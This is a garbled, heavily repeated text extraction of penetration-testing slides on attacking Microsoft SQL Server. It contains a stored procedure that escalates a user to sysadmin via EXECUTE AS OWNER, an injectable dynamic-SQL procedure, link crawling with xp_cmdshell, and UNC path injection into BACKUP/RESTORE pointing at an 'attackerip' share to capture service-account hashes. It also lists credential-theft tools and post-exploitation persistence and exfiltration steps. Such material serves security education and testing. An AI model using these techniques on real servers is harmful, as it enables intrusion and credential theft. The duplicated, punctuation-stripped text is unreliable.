USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
